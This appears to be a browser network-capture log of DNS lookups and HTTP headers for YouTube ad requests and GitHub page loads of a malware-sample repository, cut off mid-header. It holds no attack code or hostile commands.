accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:216.58.212.198:443RequestGET /instream/ad_status.js HTTP/2.0
host: static.doubleclick.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requestgithub.comIN AResponsegithub.comIN A20.26.156.215
-
Remote address:20.26.156.215:443RequestOPTIONS /Endermanch/MalwareDatabase HTTP/2.0
host: github.com
accept: */*
access-control-request-method: GET
access-control-request-headers: turbolinks-referrer
origin: https://www.malwarewatch.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 404
date: Thu, 30 Jan 2025 22:03:51 GMT
content-type: text/html; charset=utf-8
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
vary: Accept-Encoding, Accept, X-Requested-With
content-encoding: gzip
x-github-request-id: FF10:A39F0:12D996:1805B4:679BF747
-
Remote address:8.8.8.8:53Requestplay.google.comIN AResponseplay.google.comIN A142.250.187.206
-
Remote address:142.250.187.206:443RequestOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.187.206:443RequestOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.187.206:443RequestOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Request194.187.250.142.in-addr.arpaIN PTRResponse194.187.250.142.in-addr.arpaIN PTRlhr25s33-in-f21e100net
-
Remote address:8.8.8.8:53Request225.212.58.216.in-addr.arpaIN PTRResponse225.212.58.216.in-addr.arpaIN PTRams16s22-in-f11e100net225.212.58.216.in-addr.arpaIN PTRlhr25s28-in-f1�H225.212.58.216.in-addr.arpaIN PTRams16s22-in-f225�H
-
Remote address:8.8.8.8:53Request10.180.250.142.in-addr.arpaIN PTRResponse10.180.250.142.in-addr.arpaIN PTRlhr25s32-in-f101e100net
-
Remote address:8.8.8.8:53Request68.204.58.216.in-addr.arpaIN PTRResponse68.204.58.216.in-addr.arpaIN PTRlhr25s13-in-f681e100net68.204.58.216.in-addr.arpaIN PTRlhr25s13-in-f4�H68.204.58.216.in-addr.arpaIN PTRlhr48s49-in-f4�H
-
Remote address:8.8.8.8:53Request3.169.217.172.in-addr.arpaIN PTRResponse3.169.217.172.in-addr.arpaIN PTRlhr25s26-in-f31e100net
-
Remote address:8.8.8.8:53Request198.212.58.216.in-addr.arpaIN PTRResponse198.212.58.216.in-addr.arpaIN PTRams16s21-in-f61e100net198.212.58.216.in-addr.arpaIN PTRlhr25s27-in-f6�H198.212.58.216.in-addr.arpaIN PTRams16s21-in-f198�H
-
Remote address:8.8.8.8:53Request237.21.107.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request215.156.26.20.in-addr.arpaIN PTRResponse
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase HTTP/2.0
host: github.com
cache-control: max-age=0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
date: Thu, 30 Jan 2025 22:03:52 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"0d983f5c19feba04c4a149d1e5f74ba5"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
set-cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax
set-cookie: _octo=GH1.1.354131530.1738274631; Path=/; Domain=github.com; Expires=Fri, 30 Jan 2026 22:03:51 GMT; Secure; SameSite=Lax
set-cookie: logged_in=no; Path=/; Domain=github.com; Expires=Fri, 30 Jan 2026 22:03:51 GMT; HttpOnly; Secure; SameSite=Lax
x-github-request-id: D4B6:391246:133D63:18688E:679BF747
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/security/overall-count HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/fragment+html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
ResponseHTTP/2.0 204
date: Thu, 30 Jan 2025 22:03:53 GMT
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
x-github-request-id: D4B6:391246:133DEE:18694E:679BF749
-
GEThttps://github.com/Endermanch/MalwareDatabase/hovercards/citation/sidebar_partial?tree_name=mastermsedge.exeRemote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/hovercards/citation/sidebar_partial?tree_name=master HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Thu, 30 Jan 2025 22:03:53 GMT
content-type: text/fragment+html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: max-age=14400, private
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 20
x-github-request-id: D4B6:391246:133DEE:18694D:679BF747
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/used_by_list HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/fragment+html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Thu, 30 Jan 2025 22:03:53 GMT
content-type: text/plain; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 20
x-github-request-id: D4B6:391246:133DEE:18694F:679BF749
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/latest-commit/master HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Thu, 30 Jan 2025 22:03:41 GMT
content-type: application/manifest+json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: max-age=604800, public
etag: W/"c75e05794d72230a695e880f1a6c83a4"
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ 